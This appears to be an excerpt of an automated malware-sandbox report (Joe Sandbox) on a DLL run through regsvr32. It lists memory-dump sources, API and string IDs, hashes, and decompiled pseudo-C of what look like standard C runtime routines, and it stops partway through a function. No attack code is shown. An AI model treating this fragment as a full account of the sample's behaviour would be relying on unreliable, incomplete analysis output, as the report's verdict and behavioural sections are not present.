                                                                                                      0x7ff87c108fdf
                                                                                                      0x7ff87c108fdf
                                                                                                      0x7ff87c108fe3
                                                                                                      0x7ff87c108feb
                                                                                                      0x7ff87c108ff1
                                                                                                      0x7ff87c108ff6
                                                                                                      0x7ff87c108ff8
                                                                                                      0x7ff87c108ffd
                                                                                                      0x7ff87c109003
                                                                                                      0x7ff87c10900c
                                                                                                      0x7ff87c10900e
                                                                                                      0x7ff87c109012
                                                                                                      0x7ff87c109018
                                                                                                      0x7ff87c10901a
                                                                                                      0x7ff87c10901f
                                                                                                      0x7ff87c109024
                                                                                                      0x7ff87c10902a
                                                                                                      0x7ff87c10902a
                                                                                                      0x7ff87c109032
                                                                                                      0x7ff87c109038
                                                                                                      0x7ff87c10903e
                                                                                                      0x7ff87c109043
                                                                                                      0x7ff87c109045
                                                                                                      0x7ff87c10904a
                                                                                                      0x7ff87c10904e
                                                                                                      0x7ff87c109056
                                                                                                      0x7ff87c109060
                                                                                                      0x7ff87c109065
                                                                                                      0x7ff87c109067
                                                                                                      0x7ff87c10906d
                                                                                                      0x7ff87c109072
                                                                                                      0x7ff87c109077
                                                                                                      0x7ff87c10907d
                                                                                                      0x7ff87c109082
                                                                                                      0x7ff87c109087
                                                                                                      0x7ff87c10908d
                                                                                                      0x7ff87c109093
                                                                                                      0x7ff87c109097
                                                                                                      0x7ff87c10909e
                                                                                                      0x7ff87c1090a3
                                                                                                      0x7ff87c1090c2

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: -$0$f$p$p
                                                                                                      • API String ID: 3215553584-1865143739
                                                                                                      • Opcode ID: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
                                                                                                      • Instruction ID: fa5508d6b855142f9b24f84ad5cda8d09f48289829516de15649f1c2107bb5cc
                                                                                                      • Opcode Fuzzy Hash: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
                                                                                                      • Instruction Fuzzy Hash: CE12C473E2D14386FB20AA24D1543B97662FB927D4F844136E6A947AC8DF3DE5C0CB20
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                      • String ID:
                                                                                                      • API String ID: 1917832262-0
                                                                                                      • Opcode ID: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
                                                                                                      • Instruction ID: 3e408fd64115808b85e53a0c19587aa684db0046a3c7b51bada71ead8408b8af
                                                                                                      • Opcode Fuzzy Hash: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
                                                                                                      • Instruction Fuzzy Hash: 5D91C976618B408ADB65CB28E05132AF7A5F7C9788F145226DACE97B68DF3CD4498F00
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 77%
                                                                                                      			E00007FF87FF87C10D8F0(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                      				void* _t37;
                                                                                                      				signed long long _t57;
                                                                                                      				intOrPtr _t61;
                                                                                                      				signed long long _t72;
                                                                                                      				void* _t75;
                                                                                                      				signed long long _t76;
                                                                                                      				long long _t82;
                                                                                                      				void* _t86;
                                                                                                      				signed long long _t90;
                                                                                                      				signed long long _t91;
                                                                                                      				WCHAR* _t93;
                                                                                                      				long _t96;
                                                                                                      				void* _t99;
                                                                                                      				WCHAR* _t104;
                                                                                                      
                                                                                                      				 *((long long*)(_t86 + 8)) = __rbx;
                                                                                                      				 *((long long*)(_t86 + 0x10)) = _t82;
                                                                                                      				 *((long long*)(_t86 + 0x18)) = __rsi;
                                                                                                      				r15d = __ecx;
                                                                                                      				_t90 =  *0x7c17e008; // 0xefd957cda2cd
                                                                                                      				_t76 = _t75 | 0xffffffff;
                                                                                                      				_t72 = _t90 ^  *(0x7ff87c100000 + 0x7f840 + _t104 * 8);
                                                                                                      				asm("dec eax");
                                                                                                      				if (_t72 == _t76) goto 0x7c10da36;
                                                                                                      				if (_t72 == 0) goto 0x7c10d959;
                                                                                                      				_t57 = _t72;
                                                                                                      				goto 0x7c10da38;
                                                                                                      				if (__r8 == __r9) goto 0x7c10da1b;
                                                                                                      				_t61 =  *((intOrPtr*)(0x7ff87c100000 + 0x7f7a0 + __rsi * 8));
                                                                                                      				if (_t61 == 0) goto 0x7c10d980;
                                                                                                      				if (_t61 != _t76) goto 0x7c10da75;
                                                                                                      				goto 0x7c10da07;
                                                                                                      				r8d = 0x800;
                                                                                                      				LoadLibraryExW(_t104, _t99, _t96);
                                                                                                      				if (_t57 != 0) goto 0x7c10da55;
                                                                                                      				if (GetLastError() != 0x57) goto 0x7c10d9f5;
                                                                                                      				_t14 = _t57 - 0x50; // -80
                                                                                                      				_t37 = _t14;
                                                                                                      				r8d = _t37;
                                                                                                      				if (E00007FF87FF87C10F5B0(_t90) == 0) goto 0x7c10d9f5;
                                                                                                      				r8d = _t37;
                                                                                                      				if (E00007FF87FF87C10F5B0(_t90) == 0) goto 0x7c10d9f5;
                                                                                                      				r8d = 0;
                                                                                                      				LoadLibraryExW(_t93, _t75);
                                                                                                      				if (_t57 != 0) goto 0x7c10da55;
                                                                                                      				 *((intOrPtr*)(0x7ff87c100000 + 0x7f7a0 + __rsi * 8)) = _t76;
                                                                                                      				if (__r8 + 4 != __r9) goto 0x7c10d962;
                                                                                                      				_t91 =  *0x7c17e008; // 0xefd957cda2cd
                                                                                                      				asm("dec eax");
                                                                                                      				 *(0x7ff87c100000 + 0x7f840 + _t104 * 8) = _t76 ^ _t91;
                                                                                                      				return 0;
                                                                                                      			}

















                                                                                                      0x7ff87c10d8f0
                                                                                                      0x7ff87c10d8f5
                                                                                                      0x7ff87c10d8fa
                                                                                                      0x7ff87c10d90c
                                                                                                      0x7ff87c10d927
                                                                                                      0x7ff87c10d92e
                                                                                                      0x7ff87c10d938
                                                                                                      0x7ff87c10d940
                                                                                                      0x7ff87c10d946
                                                                                                      0x7ff87c10d94f
                                                                                                      0x7ff87c10d951
                                                                                                      0x7ff87c10d954
                                                                                                      0x7ff87c10d95c
                                                                                                      0x7ff87c10d965
                                                                                                      0x7ff87c10d970
                                                                                                      0x7ff87c10d975
                                                                                                      0x7ff87c10d97b
                                                                                                      0x7ff87c10d98d
                                                                                                      0x7ff87c10d993
                                                                                                      0x7ff87c10d99f
                                                                                                      0x7ff87c10d9ae
                                                                                                      0x7ff87c10d9b0
                                                                                                      0x7ff87c10d9b0
                                                                                                      0x7ff87c10d9b6
                                                                                                      0x7ff87c10d9c7
                                                                                                      0x7ff87c10d9c9
                                                                                                      0x7ff87c10d9dd
                                                                                                      0x7ff87c10d9df
                                                                                                      0x7ff87c10d9e7
                                                                                                      0x7ff87c10d9f3
                                                                                                      0x7ff87c10d9ff
                                                                                                      0x7ff87c10da0e
                                                                                                      0x7ff87c10da14
                                                                                                      0x7ff87c10da28
                                                                                                      0x7ff87c10da2e
                                                                                                      0x7ff87c10da54

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 3013587201-537541572
                                                                                                      • Opcode ID: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
                                                                                                      • Instruction ID: 4c3cbc1e504a4d60f1e049d2256ded040fdada6cbea09bb01e0dcb3da6345185
                                                                                                      • Opcode Fuzzy Hash: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
                                                                                                      • Instruction Fuzzy Hash: 3341AE23B29A4285FB15EB16D8053B62391BF47BE0F498136DD2D4B788EE3CE4C58320
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: eec7dff64ec5c52d9157cbd157dfbab6f6a7a87af12ff6c832096e5b6ec65f04
                                                                                                      • Instruction ID: 80a424895681d867c81a52222bb853e404ff1093eb4691efde65ce0aaf5b6ffa
                                                                                                      • Opcode Fuzzy Hash: eec7dff64ec5c52d9157cbd157dfbab6f6a7a87af12ff6c832096e5b6ec65f04
                                                                                                      • Instruction Fuzzy Hash: 89215B62F2CA4686FB68A721D5453396182BF4B7F4F144634ED7E07AD6DE2CF4C18620
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CONOUT$
                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                      • Opcode ID: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
                                                                                                      • Instruction ID: 7a3e5adab5fde616b247f183709989285ca944d60bf3f3bcc9fff519aa56da56
                                                                                                      • Opcode Fuzzy Hash: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
                                                                                                      • Instruction Fuzzy Hash: B0119323B28A51C6F7908B16E84432966A4FB89FE8F044335EE5D87B94DF3CD484C754
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF87C10B429,?,?,?,?,00007FF87C110426,?,?,00000000,00007FF87C10D8B7,?,?,?), ref: 00007FF87C10BA5B
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C10B429,?,?,?,?,00007FF87C110426,?,?,00000000,00007FF87C10D8B7,?,?,?), ref: 00007FF87C10BA91
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C10B429,?,?,?,?,00007FF87C110426,?,?,00000000,00007FF87C10D8B7,?,?,?), ref: 00007FF87C10BABE
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C10B429,?,?,?,?,00007FF87C110426,?,?,00000000,00007FF87C10D8B7,?,?,?), ref: 00007FF87C10BACF
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C10B429,?,?,?,?,00007FF87C110426,?,?,00000000,00007FF87C10D8B7,?,?,?), ref: 00007FF87C10BAE0
                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF87C10B429,?,?,?,?,00007FF87C110426,?,?,00000000,00007FF87C10D8B7,?,?,?), ref: 00007FF87C10BAFB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: 2fa0da27fe614c465e9bfeef243b6df5757a5299518a3d762b3cf139a2d538dd
                                                                                                      • Instruction ID: 6be05e1d7656206d69ddab185e0ec927d5693ecaa137744bc9df44600a2bc8b6
                                                                                                      • Opcode Fuzzy Hash: 2fa0da27fe614c465e9bfeef243b6df5757a5299518a3d762b3cf139a2d538dd
                                                                                                      • Instruction Fuzzy Hash: 74116A22B2C64686FB24A761D5563392282BF4B7F4F188635E83E077C6DE2CF4C18620
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
                                                                                                      • Instruction ID: b3bcdf616dc2931572b4e2379616dae0799146dc33e65fd8d22cbcb586441fb5
                                                                                                      • Opcode Fuzzy Hash: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
                                                                                                      • Instruction Fuzzy Hash: FAF0FF62A2960281FB148B24E45437A6360FF8A7E5F544236D96E4B6E4DF2CD5C98720
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 85%
                                                                                                      			E00007FF87FF87C10EB68(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                                      				signed int _t27;
                                                                                                      				signed int _t28;
                                                                                                      				signed int _t29;
                                                                                                      				signed int _t30;
                                                                                                      				signed int _t31;
                                                                                                      				signed int _t42;
                                                                                                      				signed int _t43;
                                                                                                      				signed int _t44;
                                                                                                      				signed int _t46;
                                                                                                      				void* _t51;
                                                                                                      
                                                                                                      				_a8 = __rbx;
                                                                                                      				_a16 = __rsi;
                                                                                                      				_t27 = __ecx & 0x0000001f;
                                                                                                      				if ((__ecx & 0x00000008) == 0) goto 0x7c10eb9a;
                                                                                                      				if (sil >= 0) goto 0x7c10eb9a;
                                                                                                      				E00007FF87FF87C111CEC(_t27, _t51);
                                                                                                      				_t28 = _t27 & 0xfffffff7;
                                                                                                      				goto 0x7c10ebf1;
                                                                                                      				_t42 = 0x00000004 & dil;
                                                                                                      				if (_t42 == 0) goto 0x7c10ebb5;
                                                                                                      				asm("dec eax");
                                                                                                      				if (_t42 >= 0) goto 0x7c10ebb5;
                                                                                                      				E00007FF87FF87C111CEC(_t28, _t51);
                                                                                                      				_t29 = _t28 & 0xfffffffb;
                                                                                                      				goto 0x7c10ebf1;
                                                                                                      				_t43 = dil & 0x00000001;
                                                                                                      				if (_t43 == 0) goto 0x7c10ebd1;
                                                                                                      				asm("dec eax");
                                                                                                      				if (_t43 >= 0) goto 0x7c10ebd1;
                                                                                                      				E00007FF87FF87C111CEC(_t29, _t51);
                                                                                                      				_t30 = _t29 & 0xfffffffe;
                                                                                                      				goto 0x7c10ebf1;
                                                                                                      				_t44 = dil & 0x00000002;
                                                                                                      				if (_t44 == 0) goto 0x7c10ebf1;
                                                                                                      				asm("dec eax");
                                                                                                      				if (_t44 >= 0) goto 0x7c10ebf1;
                                                                                                      				if ((dil & 0x00000010) == 0) goto 0x7c10ebee;
                                                                                                      				E00007FF87FF87C111CEC(_t30, _t51);
                                                                                                      				_t31 = _t30 & 0xfffffffd;
                                                                                                      				_t46 = dil & 0x00000010;
                                                                                                      				if (_t46 == 0) goto 0x7c10ec0b;
                                                                                                      				asm("dec eax");
                                                                                                      				if (_t46 >= 0) goto 0x7c10ec0b;
                                                                                                      				E00007FF87FF87C111CEC(_t31, _t51);
                                                                                                      				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                                                      			}













                                                                                                      0x7ff87c10eb68
                                                                                                      0x7ff87c10eb6d
                                                                                                      0x7ff87c10eb7c
                                                                                                      0x7ff87c10eb84
                                                                                                      0x7ff87c10eb89
                                                                                                      0x7ff87c10eb90
                                                                                                      0x7ff87c10eb95
                                                                                                      0x7ff87c10eb98
                                                                                                      0x7ff87c10eb9f
                                                                                                      0x7ff87c10eba2
                                                                                                      0x7ff87c10eba4
                                                                                                      0x7ff87c10eba9
                                                                                                      0x7ff87c10ebab
                                                                                                      0x7ff87c10ebb0
                                                                                                      0x7ff87c10ebb3
                                                                                                      0x7ff87c10ebb5
                                                                                                      0x7ff87c10ebb9
                                                                                                      0x7ff87c10ebbb
                                                                                                      0x7ff87c10ebc0
                                                                                                      0x7ff87c10ebc7
                                                                                                      0x7ff87c10ebcc
                                                                                                      0x7ff87c10ebcf
                                                                                                      0x7ff87c10ebd1
                                                                                                      0x7ff87c10ebd5
                                                                                                      0x7ff87c10ebd7
                                                                                                      0x7ff87c10ebdc
                                                                                                      0x7ff87c10ebe2
                                                                                                      0x7ff87c10ebe9
                                                                                                      0x7ff87c10ebee
                                                                                                      0x7ff87c10ebf1
                                                                                                      0x7ff87c10ebf5
                                                                                                      0x7ff87c10ebf7
                                                                                                      0x7ff87c10ebfc
                                                                                                      0x7ff87c10ec03
                                                                                                      0x7ff87c10ec21

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156100317-0
                                                                                                      • Opcode ID: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
                                                                                                      • Instruction ID: aa226e7bd02db46b5f8a706456061da0ecc3e3afd8c89608282ff50eff9c10f4
                                                                                                      • Opcode Fuzzy Hash: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
                                                                                                      • Instruction Fuzzy Hash: 5F11BF37E3EA2B42F764916AE55637914407F5B3E0F158634F9BF172D68E2CA8C14124
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF87C109403,?,?,00000000,00007FF87C10969E,?,?,?,?,?,00007FF87C10962A), ref: 00007FF87C10BB33
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C109403,?,?,00000000,00007FF87C10969E,?,?,?,?,?,00007FF87C10962A), ref: 00007FF87C10BB52
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C109403,?,?,00000000,00007FF87C10969E,?,?,?,?,?,00007FF87C10962A), ref: 00007FF87C10BB7A
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C109403,?,?,00000000,00007FF87C10969E,?,?,?,?,?,00007FF87C10962A), ref: 00007FF87C10BB8B
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C109403,?,?,00000000,00007FF87C10969E,?,?,?,?,?,00007FF87C10962A), ref: 00007FF87C10BB9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 8052eee4b0d8af64d03de27b504a711c4d5b3c24d31682e890b399a3a393ee09
                                                                                                      • Instruction ID: 646411174aa8abff9234eac569797c57fe366ec61646e9d19a64a7b0269850e6
                                                                                                      • Opcode Fuzzy Hash: 8052eee4b0d8af64d03de27b504a711c4d5b3c24d31682e890b399a3a393ee09
                                                                                                      • Instruction Fuzzy Hash: 67113D12F2C64646FB68E725D952B7961827F467F0F188734D83E077DADE2CE4C18620
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 42504d049ca0b81dd607a4491970e33291414fa471f24a262c13f0c89c120e85
                                                                                                      • Instruction ID: de7b1bb8e9b27ac6fb60b82f7b43eb93e478d6476d499980c04beff4a647d68c
                                                                                                      • Opcode Fuzzy Hash: 42504d049ca0b81dd607a4491970e33291414fa471f24a262c13f0c89c120e85
                                                                                                      • Instruction Fuzzy Hash: C3119612A2960686FB68E625D45637911817F4B7E4E184A35E93E0B3D2DE2CB4C19634
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 49%
                                                                                                      			E00007FF87FF87C110958(void* __ecx, signed int __edx, void* __esi, void* __ebp, void* __esp, long long __rbx, intOrPtr* __rcx, long long __r8) {
                                                                                                      				void* __rdi;
                                                                                                      				void* __rsi;
                                                                                                      				void* __rbp;
                                                                                                      				intOrPtr _t181;
                                                                                                      				signed int _t186;
                                                                                                      				signed int _t193;
                                                                                                      				signed int _t198;
                                                                                                      				void* _t212;
                                                                                                      				signed char _t213;
                                                                                                      				void* _t263;
                                                                                                      				signed long long _t264;
